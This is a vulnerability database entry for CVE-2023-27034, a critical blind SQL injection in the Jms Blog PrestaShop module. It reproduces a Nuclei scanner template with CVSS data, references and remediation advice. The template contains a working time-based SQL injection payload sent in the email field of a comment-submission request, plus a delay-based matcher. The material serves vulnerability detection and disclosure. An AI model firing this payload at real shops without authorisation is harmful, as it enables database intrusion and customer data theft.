Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-27034HistoryJul 24, 2023 - 10:10 p.m.
Blind SQL injection vulnerability in Jms Blog
2023-07-2422:10:33
ProjectDiscovery
github.com
55
blind sql injection
jms blog
joommasters
presta shop
data leak
unauthorized access
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
10
Confidence
High
EPSS
0.038
Percentile
92.1%
The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
id: CVE-2023-27034
info:
name: Blind SQL injection vulnerability in Jms Blog
author: MaStErChO
severity: critical
description: |
The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and its underlying infrastructure.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
- https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
- https://github.com/advisories/GHSA-7jr7-v6gv-m656
- https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html
- https://github.com/codeb0ss/CVE-2023-27034-Exploit
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27034
cwe-id: CWE-89
epss-score: 0.01204
epss-percentile: 0.85171
cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:*
metadata:
max-request: 2
vendor: joommasters
product: jms_blog
framework: prestashop
tags: cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters
http:
- raw:
- |
@timeout: 12s
POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}
Host: {{Hostname}}
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="comment"
555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="customer_name"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="post_id"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="post_id_comment_reply"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submitComment"
submitComment=
------------YWJkMTQzNDcw--
- |
GET /modules/jmsblog/config.xml HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'contains(body_2, "Jms Blog")'
condition: and
# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2023-27034
2023-03-23 00:00:00
cve
cve
CVE-2023-27034
2023-03-23 22:15:13
prion
prion
Sql injection
2023-03-23 22:15:00
githubexploit
githubexploit
Exploit for SQL Injection in Joommasters Jms Blog
2023-09-05 04:43:06
nvd
nvd
CVE-2023-27034
2023-03-23 22:15:13
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
10
Confidence
High
EPSS
0.038
Percentile
92.1%
Related for NUCLEI:CVE-2023-27034